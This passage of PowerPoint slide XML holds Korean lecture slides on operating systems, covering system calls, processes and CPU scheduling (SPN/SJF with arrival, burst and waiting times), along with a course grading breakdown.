          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1037" name="그림 1036">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C433C58C-3507-40A3-B0E0-308ACEA35701}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1525011" y="4788295"/>
            <a:ext cx="1123950" cy="1247775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="80" name="직선 화살표 연결선 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21C6823D-AB2B-4F24-9E20-39BD84113B6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2735249" y="4395030"/>
            <a:ext cx="949120" cy="10563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91BC2ABF-55B4-4EA8-BEF6-ABDC8A6B6569}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1944391" y="4412196"/>
            <a:ext cx="1739979" cy="66462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49" name="화살표: 오른쪽으로 구부러짐 1048">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B79177B7-F879-434C-8984-EF4A9F1B0F8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1399625">
            <a:off x="5688650" y="3027209"/>
            <a:ext cx="551469" cy="1083829"/>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0" name="TextBox 1049">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAC0AE96-FB4D-4931-A4CB-92297634C319}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8732194" y="2791147"/>
            <a:ext cx="3180522" cy="697050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>cd Desktop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>echo “I ate 5 hamburger“ &gt; ham.txt</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1052" name="그림 1051">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDFA2ECC-FEB4-43D0-AEFA-6E8AE6DB8898}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId17"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597284" y="3582698"/>
            <a:ext cx="3500850" cy="980514"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="화살표: 오른쪽으로 구부러짐 99">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26F8092C-F78B-439E-B061-941C08DB34B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1399625">
            <a:off x="5831219" y="4107959"/>
            <a:ext cx="172240" cy="263748"/>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6" name="TextBox 1055">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F47F1360-01F4-4A9E-BB9D-625280C8CD77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5126477" y="5826868"/>
            <a:ext cx="2417632" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>System Call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="102" name="직선 화살표 연결선 101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FBB6EB3-C9A4-4629-AB50-67C78C927D4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="100" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5710136" y="4191519"/>
            <a:ext cx="134251" cy="160860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60" name="그림 1059">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{264A6984-4A82-4081-854D-3A27694738FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId18"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8588828" y="5071017"/>
            <a:ext cx="561975" cy="295275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="107" name="직선 화살표 연결선 106">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{502720DC-1699-424C-859A-1D09D9351375}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="1060" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8038688" y="5218654"/>
            <a:ext cx="550140"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53" name="직사각형 1052">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BD6D048-6D31-4E23-9143-2B70B13CAC32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5473172" y="2608028"/>
            <a:ext cx="2894301" cy="294942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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1063" name="TextBox 1062">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5000F992-58BD-4048-8E31-59E2261E6AE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="119184" y="6399272"/>
            <a:ext cx="5232129" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>응용프로그램 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>사용하기 쉽게 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>만든것을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t> 사용하기 쉽게 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>만든것</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>..</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10669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05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4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5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5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6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 grpId="0" animBg="1"/>
      <p:bldP spid="1050" grpId="0"/>
      <p:bldP spid="100" grpId="0" animBg="1"/>
      <p:bldP spid="1056" grpId="0"/>
      <p:bldP spid="1053" grpId="0" animBg="1"/>
      <p:bldP spid="1063" grpId="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6654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1" y="3152898"/>
            <a:ext cx="3853542"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(50%)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5507182" y="2268185"/>
            <a:ext cx="1760518"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(20%)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="직사각형 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{693DB5F8-8FCA-4822-AAF1-273220AAA4D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7267700" y="3152894"/>
            <a:ext cx="958934" cy="132556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토의</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>(10%)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="직사각형 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D524D3C-E67B-4483-B251-B765D785B9A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8226634" y="2268182"/>
            <a:ext cx="958934" cy="132556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과제</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>(10%)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9" name="그룹 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A57367BA-42E7-4F22-9263-122C7C4BF225}"/>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0AB1300-9766-4C11-B2E4-599251261F2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C3390B9-ABA1-4F10-8543-452EB3F56EB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3" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9A50E57-2948-4768-8516-A49E6BA9D3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145541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5340A3BB-9D8B-4B8A-8714-02878CEDBDD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="709321" y="1975176"/>
            <a:ext cx="2533792" cy="4395354"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="그림 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98DBCDD1-031D-411E-9509-ED8634A27777}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4140404" y="2581005"/>
            <a:ext cx="2866222" cy="2539636"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB34D3D9-16F3-45D3-A182-4CCA91B3D5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1651" y="3018196"/>
            <a:ext cx="3701028" cy="210244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PU icon illustration - Free Image on 4 Free Photos">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCBF728D-3FFF-4FD9-B37D-A932456AF4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59700" y="2039488"/>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9E1E251-7A29-45F9-8088-EFF4EDBFEC7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8523799" y="5438692"/>
            <a:ext cx="2568272" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>“ Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scheduling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F8CA36E-8228-4968-8FDA-9F69CCEC0B61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4891691" y="5341490"/>
            <a:ext cx="1363648" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>“ Process "</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="266642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4" name="Picture 4" descr="운영체제(OS)] 6. CPU 스케줄링">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{088C2DB0-67F8-4189-A30D-D0071D14CF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1253" y="4270979"/>
            <a:ext cx="9048750" cy="1628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3C9541-B1D5-43A4-A135-057889695698}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5197472" y="1884630"/>
            <a:ext cx="4570506" cy="869790"/>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SPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shortest Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>SJF</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79BDF1D0-4928-461E-B82C-0DE14A44762C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3458070" y="5892548"/>
            <a:ext cx="3244132" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>P3 Process “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Arrival Time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>” = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6DBBFC7-0ABC-4EDB-8C00-F1200AAF0B45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7619149" y="5261415"/>
            <a:ext cx="3204076" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>P3 Process “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Burst Time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>” = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="직선 화살표 연결선 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F79945B-B526-44D8-8B29-9389FF15941D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8295114" y="5041635"/>
            <a:ext cx="6440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E66896A5-CBA4-426E-999E-5A63E1D2331F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9376492" y="5041635"/>
            <a:ext cx="6758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623B73-0B7E-4012-A868-91231157AB7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8939170" y="487465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sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="TextBox 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21B6E868-0619-4AEF-8688-2EA87C1B9A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5080136" y="5037715"/>
            <a:ext cx="3593989" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>P3 Process “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Waiting Time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>” = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="44" name="내용 개체 틀 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A28BEF2-524D-42EC-BE07-E9B7FAEC428B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
